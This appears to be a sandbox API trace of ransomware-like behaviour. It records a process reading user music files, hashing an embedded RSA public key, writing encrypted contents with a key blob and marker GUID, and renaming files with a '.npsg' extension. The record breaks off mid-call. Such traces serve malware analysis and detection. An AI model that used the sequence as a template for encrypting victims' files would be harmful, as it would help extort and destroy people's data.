RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0239.065] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0239.065] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400cb0 | out: hHeap=0x620000) returned 1 [0239.065] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0239.065] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c98 | out: hHeap=0x620000) returned 1 [0239.065] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0239.065] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0239.065] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400cf8 | out: hHeap=0x620000) returned 1 [0239.065] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0239.065] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0239.065] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90a38 | out: hHeap=0x620000) returned 1 [0239.065] GetCurrentThreadId () returned 0x5b4 [0239.065] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0239.065] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b87a68 [0239.065] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0239.065] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.065] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x340dd38 [0239.065] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0239.065] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0239.065] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0239.065] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.066] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.066] GetCurrentThreadId () returned 0x5b4 [0239.066] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.066] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.066] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x33c2ee8 [0239.066] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.066] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.066] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.066] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.066] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0239.066] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33c2ee8 [0239.066] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0239.066] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0239.066] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0239.066] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0239.066] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0239.066] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400cf8 [0239.066] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0239.066] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0239.066] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0239.066] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0239.066] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0239.067] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0239.067] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0239.067] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0239.067] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400c98 [0239.067] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0239.067] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0239.067] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0239.067] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0239.067] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0239.067] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0239.067] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0239.067] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400cb0 [0239.067] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0239.067] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0239.067] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0239.067] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400c80 [0239.067] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0239.067] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400d10 [0239.067] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0239.067] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0239.067] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0239.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400ce0 [0239.068] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0239.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400cc8 [0239.068] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0239.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400d28 [0239.068] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400cc8 | out: hHeap=0x620000) returned 1 [0239.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400cc8 [0239.068] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400ce0 | out: hHeap=0x620000) returned 1 [0239.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0239.068] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0239.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0239.068] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0239.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0239.068] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c98 | out: hHeap=0x620000) returned 1 [0239.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400c98 [0239.068] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0239.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90a38 [0239.068] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400cf8 | out: hHeap=0x620000) returned 1 [0239.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b948 [0239.068] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400d28 | out: hHeap=0x620000) returned 1 [0239.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x3b947f8 [0239.069] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0239.069] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7bb78 [0239.069] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0239.069] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b830 [0239.069] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c98 | out: hHeap=0x620000) returned 1 [0239.069] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x3b94a10 [0239.069] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0239.069] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x3b94c18 [0239.069] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0239.069] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.069] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0239.069] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94c18 | out: hHeap=0x620000) returned 1 [0239.069] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0239.069] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0239.069] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0239.069] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94a10 | out: hHeap=0x620000) returned 1 [0239.069] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0239.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0239.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400cc8 | out: hHeap=0x620000) returned 1 [0239.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0239.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400d10 | out: hHeap=0x620000) returned 1 [0239.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0239.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400cb0 | out: hHeap=0x620000) returned 1 [0239.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c80 | out: hHeap=0x620000) returned 1 [0239.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0239.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0239.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0239.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c68 | out: hHeap=0x620000) returned 1 [0239.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b86480 | out: hHeap=0x620000) returned 1 [0239.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90a38 | out: hHeap=0x620000) returned 1 [0239.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0239.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5148 | out: hHeap=0x620000) returned 1 [0239.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0239.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0239.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0239.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0239.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0239.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0239.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0239.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0239.071] WriteFile (in: hFile=0x644, lpBuffer=0x3b95d50*, nNumberOfBytesToWrite=0x7d7f, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b95d50*, lpNumberOfBytesWritten=0x39afb14*=0x7d7f, lpOverlapped=0x0) returned 1 [0239.071] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b95d50 | out: hHeap=0x620000) returned 1 [0239.071] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x7d84, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.071] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0239.071] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0239.071] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d258 [0239.071] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x3b947f8 [0239.071] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x3b947f8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0239.071] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x346fa10 [0239.072] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0239.072] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d258 | out: hHeap=0x620000) returned 1 [0239.072] WriteFile (in: hFile=0x644, lpBuffer=0x346fa10*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x346fa10*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0239.072] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0239.072] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0239.072] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0239.072] CloseHandle (hObject=0x644) returned 1 [0239.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0239.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8a0) returned 0x3b88cd0 [0239.074] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0239.074] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\--nHV1eb\\X7 lGND.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\--nhv1eb\\x7 lgnd.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\--nHV1eb\\X7 lGND.wav.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\--nhv1eb\\x7 lgnd.wav.npsg")) returned 1 [0239.075] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88cd0 | out: hHeap=0x620000) returned 1 [0239.075] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0239.075] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0239.077] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a87c0 | out: hHeap=0x620000) returned 1 [0239.077] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60ca6140, ftCreationTime.dwHighDateTime=0x1d5b9b6, ftLastAccessTime.dwLowDateTime=0x639d2e10, ftLastAccessTime.dwHighDateTime=0x1d5b7fa, ftLastWriteTime.dwLowDateTime=0x639d2e10, ftLastWriteTime.dwHighDateTime=0x1d5b7fa, nFileSizeHigh=0x0, nFileSizeLow=0xd84d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZxYF5gpA.m4a", cAlternateFileName="")) returned 1 [0239.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xbe) returned 0x33a87c0 [0239.077] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.077] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\--nHV1eb\\ZxYF5gpA.m4a") returned=".m4a" [0239.077] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\--nHV1eb\\ZxYF5gpA.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\--nhv1eb\\zxyf5gpa.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0239.078] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=55373) returned 1 [0239.078] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0239.081] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xd827, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.081] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0239.082] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0239.083] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0239.083] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0239.083] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0xd84d, lpOverlapped=0x0) returned 1 [0239.085] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.085] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0239.085] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.085] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.085] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0239.086] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0239.086] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0239.086] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0239.086] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0239.086] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0239.086] GetLastError () returned 0x0 [0239.087] CryptDestroyHash (hHash=0x33f0408) returned 1 [0239.087] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0239.087] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0239.087] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0239.087] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0239.087] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0239.087] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0239.087] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0239.087] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0239.087] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xd850) returned 0x3b95d50 [0239.087] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0239.087] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0239.087] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0239.088] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0239.088] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0239.088] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0239.088] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b86480 [0239.088] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400c68 [0239.088] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b864c8 [0239.088] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400c80 [0239.088] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400cb0 [0239.088] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400d10 [0239.088] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400cc8 [0239.088] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0239.088] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90a38 [0239.089] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xd84d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.089] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0239.089] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0239.089] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0239.089] WriteFile (in: 